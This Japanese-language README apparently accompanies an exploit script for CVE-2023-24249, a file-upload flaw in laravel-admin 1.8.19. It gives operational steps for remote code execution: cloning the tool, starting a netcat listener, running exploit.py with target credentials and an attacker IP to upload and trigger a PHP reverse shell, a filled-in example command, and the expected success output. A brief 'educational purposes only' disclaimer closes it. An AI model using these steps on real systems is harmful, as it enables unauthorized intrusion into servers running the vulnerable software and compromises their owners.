
CVE-2023-24249のエクスプロイトスクリプト - ファイルアップロードとコマンドインジェクションを介したリモートコード実行を可能にする脆弱性。
このリポジトリには、laravel-admin バージョン 1.8.19 で見つかった重大な脆弱性 CVE-2023-24249 のエクスプロイトスクリプトが含まれています。この脆弱性により、任意のファイルアップロードが可能となり、攻撃者は細工した PHP ファイルを介して任意のコードを実行できます。このエクスプロイトは、攻撃者が対象アプリケーションにリバースシェルをアップロードし、それを実行してリモートアクセスを得る方法を示しています。
CVE-2023-24249 は、laravel-admin v1.8.19 における任意のファイルアップロード脆弱性です。この脆弱性により、攻撃者は任意の PHP ファイルをアップロードおよび実行でき、結果としてリモートコード実行が可能となります。
提供されるエクスプロイトスクリプトは、CVE-2023-24249 を悪用するプロセスを自動化します。以下の手順を実行します:
requests ライブラリbeautifulsoup4 ライブラリ必要なライブラリを pip でインストールします:
pip install requests beautifulsoup4
リポジトリのクローン:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
マシン上でリスナーを起動:
nc -lvnp <PORT>
エクスプロイトスクリプトの実行:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
<TARGET_URL>、<USERNAME>、<PASSWORD>、<YOUR_IP>、<YOUR_PORT> を適切な値に置き換えてください:
<TARGET_URL>: 対象アプリケーションの URL。<USERNAME>: 認証用のユーザー名。<PASSWORD>: 認証用のパスワード。<YOUR_IP>: リバースシェル接続を受け取るあなたの IP アドレス。python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
エクスプロイトが成功した場合、スクリプトは以下を出力します:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
このスクリプトは教育目的のみを意図しています。明示的な許可なく任意のシステムに対してこのスクリプトを不正に使用することは違法であり、非倫理的です。作者はこのスクリプトの誤用または損害について一切の責任を負いません。
<YOUR_PORT>: リスナーが実行されているポート。